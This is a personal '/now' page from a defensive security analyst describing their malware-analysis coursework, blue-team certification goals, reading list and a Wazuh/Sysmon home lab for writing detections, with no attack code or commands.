// CURRENTLY
What I'm working on right now
A living page — what I'm learning, reading, building, and breaking. Inspired by Derek Sivers' /now movement. Updated monthly so you always get the freshest version of me, not a stale resume.
Learning
Practical Malware Analysis & Triage
TCM Security · Matt Kiely (HuskyHacks)
Going deep on static and dynamic malware analysis. The course flips the typical analyst mindset — instead of waiting for an alert, you tear apart the binary, watch what it does, and write the detection that catches the next variant.
Currently working through PE structure analysis with PE-bear, behavioral triage in a controlled VM, and stepping through unpacking routines in x32dbg. Next up: Ghidra for proper reverse engineering and writing my first non-trivial YARA rules.
Currently working through PE structure analysis with PE-bear, behavioral triage in a controlled VM, and stepping through unpacking routines in x32dbg. Next up: Ghidra for proper reverse engineering and writing my first non-trivial YARA rules.
Module 5 of 12~42%
x32dbgGhidraPE-bear
YARAFLOSSSandboxing
BTL2 — Blue Team Level 2
Security Blue Team
Next up after malware analysis. The natural progression from CDSA — deeper threat hunting, advanced phishing analysis, threat intel, and digital forensics. Targeting completion by Q3 2026.
Reading
-
Practical Threat Intelligence and Data-Driven Threat Hunting · Valentina Costa-Gazcón // teaches you to hunt with hypotheses instead of alert-chasing — already changed how I read TI reports
-
The Cuckoo's Egg · Cliff Stoll // foundational. proof that good incident response has always been about curiosity + meticulous notes
-
Daily reads: The DFIR Report, Microsoft Threat Intelligence Blog, BushidoToken, Red Canary's "Threat Detection Reports"
Building
Home Lab — Wazuh + Sysmon + Atomic Red Team
Personal project · ongoing
Setting up a small Windows + Linux environment with Wazuh as the SIEM, Sysmon shipping rich telemetry, and Atomic Red Team for safe TTP simulation. The goal: detonate a technique, see what shows up in logs, write the detection, repeat.
Half the value is the muscle memory of building it from scratch — the other half is having a place to test the YARA rules I'm writing in TCM's course.
Half the value is the muscle memory of building it from scratch — the other half is having a place to test the YARA rules I'm writing in TCM's course.
Goals · 2026
HTB CDSA cleared March 2026
Finish TCM Malware Analysis ~42% complete
Pass BTL2 target: Q3 2026
Publish 6 detection rules to GitHub 1 of 6
Write 3 deep-dive blog posts 1 of 3 — CPUID done
Speak at one local meetup looking for a topic + venue
Mindset
Defenders only have to be wrong once. Attackers only have to be right once. The asymmetry is real — but the way you close it is by reading more reports, writing more rules, and letting curiosity outpace burnout.
— me, to myself, after every shift
Thanks for caring enough to read this far.
Want to chat threat hunting, malware analysis, or anything blue-team? say hi or find me on LinkedIn.